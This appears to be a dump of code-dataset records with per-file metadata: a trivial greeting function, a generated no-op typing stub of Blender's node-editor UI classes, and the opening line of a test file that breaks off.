d157f83c4ffb0b1a19d8371c0bb04cf836e187a8
|
[
"MIT"
] | 1
|
2020-03-02T08:24:58.000Z
|
2020-03-02T08:24:58.000Z
|
logic.py
|
Dikower/Starlette-Alice
|
d157f83c4ffb0b1a19d8371c0bb04cf836e187a8
|
[
"MIT"
] | null | null | null |
logic.py
|
Dikower/Starlette-Alice
|
d157f83c4ffb0b1a19d8371c0bb04cf836e187a8
|
[
"MIT"
] | null | null | null |
def do_something():
    """Return a fixed greeting string."""
    greeting = 'Hello world!'
    return greeting
| 15.333333
| 25
| 0.673913
| 6
| 46
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.195652
| 46
| 2
| 26
| 23
| 0.810811
| 0
| 0
| 0
| 0
| 0
| 0.26087
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
e184436911fd94f03a8fe935738294beb5044fe7
| 43,704
|
py
|
Python
|
typings/bl_ui/space_node.py
|
Argmaster/PyR3
|
6786bcb6a101fe4bd4cc50fe43767b8178504b15
|
[
"MIT"
] | 2
|
2021-12-12T18:51:52.000Z
|
2022-02-23T09:49:16.000Z
|
src/blender/blender_autocomplete-master/2.92/bl_ui/space_node.py
|
JonasWard/ClayAdventures
|
a716445ac690e4792e70658319aa1d5299f9c9e9
|
[
"MIT"
] | 2
|
2021-11-08T12:09:02.000Z
|
2021-12-12T23:01:12.000Z
|
typings/bl_ui/space_node.py
|
Argmaster/PyR3
|
6786bcb6a101fe4bd4cc50fe43767b8178504b15
|
[
"MIT"
] | null | null | null |
import sys
import typing
import bpy_types
import bl_ui.space_toolsystem_common
import bl_ui.properties_grease_pencil_common
import bl_ui.utils
class NODE_HT_header(bpy_types.Header, bpy_types._GenericUI):
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_MT_add(bpy_types.Menu, bpy_types._GenericUI):
bl_label = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
bl_translation_context = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_collapsible(self, context, layout):
'''
'''
pass
def draw_preset(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_menu(self, searchpaths, operator, props_default, prop_filepath,
filter_ext, filter_path, display_name, add_operator):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_MT_context_menu(bpy_types.Menu, bpy_types._GenericUI):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_collapsible(self, context, layout):
'''
'''
pass
def draw_preset(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_menu(self, searchpaths, operator, props_default, prop_filepath,
filter_ext, filter_path, display_name, add_operator):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_MT_editor_menus(bpy_types.Menu, bpy_types._GenericUI):
bl_idname = None
''' '''
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, _context):
'''
'''
pass
def draw_collapsible(self, context, layout):
'''
'''
pass
def draw_preset(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_menu(self, searchpaths, operator, props_default, prop_filepath,
filter_ext, filter_path, display_name, add_operator):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_MT_node(bpy_types.Menu, bpy_types._GenericUI):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, _context):
'''
'''
pass
def draw_collapsible(self, context, layout):
'''
'''
pass
def draw_preset(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_menu(self, searchpaths, operator, props_default, prop_filepath,
filter_ext, filter_path, display_name, add_operator):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_MT_node_color_context_menu(bpy_types.Menu, bpy_types._GenericUI):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, _context):
'''
'''
pass
def draw_collapsible(self, context, layout):
'''
'''
pass
def draw_preset(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_menu(self, searchpaths, operator, props_default, prop_filepath,
filter_ext, filter_path, display_name, add_operator):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_MT_select(bpy_types.Menu, bpy_types._GenericUI):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, _context):
'''
'''
pass
def draw_collapsible(self, context, layout):
'''
'''
pass
def draw_preset(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_menu(self, searchpaths, operator, props_default, prop_filepath,
filter_ext, filter_path, display_name, add_operator):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_MT_view(bpy_types.Menu, bpy_types._GenericUI):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_collapsible(self, context, layout):
'''
'''
pass
def draw_preset(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_menu(self, searchpaths, operator, props_default, prop_filepath,
filter_ext, filter_path, display_name, add_operator):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_active_node_color(bpy_types.Panel, bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_header_preset(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_active_node_generic(bpy_types.Panel, bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_active_node_properties(bpy_types.Panel, bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def show_socket_input(self, socket):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_active_tool(bl_ui.space_toolsystem_common.ToolActivePanelHelper,
bpy_types.Panel, bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_annotation(
bl_ui.properties_grease_pencil_common.AnnotationDataPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_layers(self, context, layout, gpd):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_backdrop(bpy_types.Panel, bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_material_slots(bpy_types.Panel, bpy_types._GenericUI):
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
bl_ui_units_x = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_node_color_presets(bl_ui.utils.PresetPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
preset_add_operator = None
''' '''
preset_operator = None
''' '''
preset_subdir = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_menu(self, layout, text):
'''
'''
pass
def draw_panel_header(self, layout):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_menu(self, searchpaths, operator, props_default, prop_filepath,
filter_ext, filter_path, display_name, add_operator):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_quality(bpy_types.Panel, bpy_types._GenericUI):
    '''Generated API-skeleton stub; all members are no-op placeholders.'''

    bl_category = None
    bl_label = None
    bl_region_type = None
    bl_rna = None
    bl_space_type = None
    id_data = None

    def append(self, draw_func):
        '''No-op stub.'''

    def as_pointer(self):
        '''No-op stub.'''

    def bl_rna_get_subclass(self):
        '''No-op stub.'''

    def bl_rna_get_subclass_py(self):
        '''No-op stub.'''

    def draw(self, context):
        '''No-op stub.'''

    def driver_add(self):
        '''No-op stub.'''

    def driver_remove(self):
        '''No-op stub.'''

    def get(self):
        '''No-op stub.'''

    def is_extended(self):
        '''No-op stub.'''

    def is_property_hidden(self):
        '''No-op stub.'''

    def is_property_overridable_library(self):
        '''No-op stub.'''

    def is_property_readonly(self):
        '''No-op stub.'''

    def is_property_set(self):
        '''No-op stub.'''

    def items(self):
        '''No-op stub.'''

    def keyframe_delete(self):
        '''No-op stub.'''

    def keyframe_insert(self):
        '''No-op stub.'''

    def keys(self):
        '''No-op stub.'''

    def path_from_id(self):
        '''No-op stub.'''

    def path_resolve(self):
        '''No-op stub.'''

    def poll(self, context):
        '''No-op stub.'''

    def pop(self):
        '''No-op stub.'''

    def prepend(self, draw_func):
        '''No-op stub.'''

    def property_overridable_library_set(self):
        '''No-op stub.'''

    def property_unset(self):
        '''No-op stub.'''

    def remove(self, draw_func):
        '''No-op stub.'''

    def type_recast(self):
        '''No-op stub.'''

    def values(self):
        '''No-op stub.'''
class NODE_PT_texture_mapping(bpy_types.Panel, bpy_types._GenericUI):
    '''Generated API-skeleton stub; all members are no-op placeholders.'''

    COMPAT_ENGINES = None
    bl_category = None
    bl_label = None
    bl_options = None
    bl_region_type = None
    bl_rna = None
    bl_space_type = None
    id_data = None

    def append(self, draw_func):
        '''No-op stub.'''

    def as_pointer(self):
        '''No-op stub.'''

    def bl_rna_get_subclass(self):
        '''No-op stub.'''

    def bl_rna_get_subclass_py(self):
        '''No-op stub.'''

    def draw(self, context):
        '''No-op stub.'''

    def driver_add(self):
        '''No-op stub.'''

    def driver_remove(self):
        '''No-op stub.'''

    def get(self):
        '''No-op stub.'''

    def is_extended(self):
        '''No-op stub.'''

    def is_property_hidden(self):
        '''No-op stub.'''

    def is_property_overridable_library(self):
        '''No-op stub.'''

    def is_property_readonly(self):
        '''No-op stub.'''

    def is_property_set(self):
        '''No-op stub.'''

    def items(self):
        '''No-op stub.'''

    def keyframe_delete(self):
        '''No-op stub.'''

    def keyframe_insert(self):
        '''No-op stub.'''

    def keys(self):
        '''No-op stub.'''

    def path_from_id(self):
        '''No-op stub.'''

    def path_resolve(self):
        '''No-op stub.'''

    def poll(self, context):
        '''No-op stub.'''

    def pop(self):
        '''No-op stub.'''

    def prepend(self, draw_func):
        '''No-op stub.'''

    def property_overridable_library_set(self):
        '''No-op stub.'''

    def property_unset(self):
        '''No-op stub.'''

    def remove(self, draw_func):
        '''No-op stub.'''

    def type_recast(self):
        '''No-op stub.'''

    def values(self):
        '''No-op stub.'''
class NODE_UL_interface_sockets(bpy_types.UIList, bpy_types._GenericUI):
    '''Generated API-skeleton stub; all members are no-op placeholders.'''

    bl_rna = None
    id_data = None

    def append(self, draw_func):
        '''No-op stub.'''

    def as_pointer(self):
        '''No-op stub.'''

    def bl_rna_get_subclass(self):
        '''No-op stub.'''

    def bl_rna_get_subclass_py(self):
        '''No-op stub.'''

    def draw_item(self, context, layout, _data, item, icon, _active_data,
                  _active_propname, _index):
        '''No-op stub.'''

    def driver_add(self):
        '''No-op stub.'''

    def driver_remove(self):
        '''No-op stub.'''

    def get(self):
        '''No-op stub.'''

    def is_extended(self):
        '''No-op stub.'''

    def is_property_hidden(self):
        '''No-op stub.'''

    def is_property_overridable_library(self):
        '''No-op stub.'''

    def is_property_readonly(self):
        '''No-op stub.'''

    def is_property_set(self):
        '''No-op stub.'''

    def items(self):
        '''No-op stub.'''

    def keyframe_delete(self):
        '''No-op stub.'''

    def keyframe_insert(self):
        '''No-op stub.'''

    def keys(self):
        '''No-op stub.'''

    def path_from_id(self):
        '''No-op stub.'''

    def path_resolve(self):
        '''No-op stub.'''

    def pop(self):
        '''No-op stub.'''

    def prepend(self, draw_func):
        '''No-op stub.'''

    def property_overridable_library_set(self):
        '''No-op stub.'''

    def property_unset(self):
        '''No-op stub.'''

    def remove(self, draw_func):
        '''No-op stub.'''

    def type_recast(self):
        '''No-op stub.'''

    def values(self):
        '''No-op stub.'''
def node_draw_tree_view(_layout, _context):
    '''No-op stub (generated API skeleton); parameters are ignored.'''
def node_panel(cls):
    '''No-op stub (generated API skeleton); the class argument is ignored.'''
| 12.286759
| 78
| 0.385182
| 3,606
| 43,704
| 4.39462
| 0.034664
| 0.227488
| 0.277655
| 0.077933
| 0.959992
| 0.956585
| 0.948129
| 0.946173
| 0.946173
| 0.944974
| 0
| 0
| 0.48213
| 43,704
| 3,556
| 79
| 12.290214
| 0.700172
| 0
| 0
| 0.963425
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.44389
| false
| 0.44389
| 0.004988
| 0
| 0.545303
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 12
|
e1c0e6d4f21996d124e19b062cb7c14572573ce1
| 92
|
py
|
Python
|
tests/test_import.py
|
pierre-rouanet/zzlog
|
a7d27ce968842ae75fb6f5b913367302544ce8b6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_import.py
|
pierre-rouanet/zzlog
|
a7d27ce968842ae75fb6f5b913367302544ce8b6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_import.py
|
pierre-rouanet/zzlog
|
a7d27ce968842ae75fb6f5b913367302544ce8b6
|
[
"Apache-2.0"
] | null | null | null |
def test_import():
